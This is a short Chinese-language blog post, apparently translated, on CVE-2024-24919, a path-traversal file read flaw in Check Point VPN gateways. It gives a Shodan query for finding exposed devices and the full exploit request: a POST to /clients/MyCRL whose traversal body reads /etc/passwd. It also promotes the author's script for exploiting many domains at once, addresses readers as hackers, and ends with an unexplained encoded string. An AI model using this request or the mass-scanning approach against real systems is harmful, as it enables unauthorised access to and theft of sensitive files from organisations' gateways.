Check Point VPN网关CVE-2024-24919漏洞剖析:从原理到自动化利用

29 阅读2分钟

CVE-2024–24919:Check Point VPN网关中的任意文件读取漏洞

作者: $ubh@nk@r 阅读时间: 2 分钟 发布日期: 2024年6月7日

简介: 大家好,黑客们!👋 在今天的文章中,我将讨论一个名为 CVE-2024-24919 的最新漏洞。我们将在此了解如何识别该漏洞并利用它。该漏洞在 Check Point 的 CloudGuard 网络安全设备中被发现。我还将向大家介绍一个工具,可以轻松地在大范围目标上自动化利用此漏洞。那么,我们开始吧。

Shodan Dork: 任何人都可以使用以下 Shodan Dork 来查找此 CVE:

Server:"Check Point SVN Foundation""org"

利用 CVE-2024–24919: 该漏洞可通过向 /clients/MyCRL 端点发送特制的 POST 请求来利用。以下是利用思路:

POST /clients/MyCRL HTTP/1.1
host: target
Content-Length: 39

aCSHELL/../../../../../../../etc/passwd [POST Body]

如果目标域名存在漏洞,它将显示 /etc/passwd 文件的内容。

自动化利用 CVE-2024–24919: 最后,我编写了一个 Bash 脚本来自动化此漏洞利用过程。 GitHub - starlox0/CVE-2024-24919-POC: 一个用于自动化CVE-2024-24919的简单漏洞利用代码(POC)

本质上,我利用了这一个单行的 curl 命令行工具。 我将此工具用在我的脚本中。你可以针对单个域名或多个域名进行测试。 → 针对多个域名。 多么简单!😄


这就是今天的内容。希望你们学到了一些新东西。请继续关注我的下一篇文章。 感谢阅读! 😄 如果喜欢,别忘了点赞并关注我以获取更多文章。 祝你黑客愉快! ~ CSD0tFqvECLokhw9aBeRqteIgvZsxhm14qXjGWMVhkLNkfLFNQQTShIX6r8NWdTB6q2Q58n9qUz/4bOKG29WEpTrhaqSQOmZhCdmEm86OFQmJXE1k7fcUhBHzLwh58Ey25A7g89h4prYzdSx2bHjow==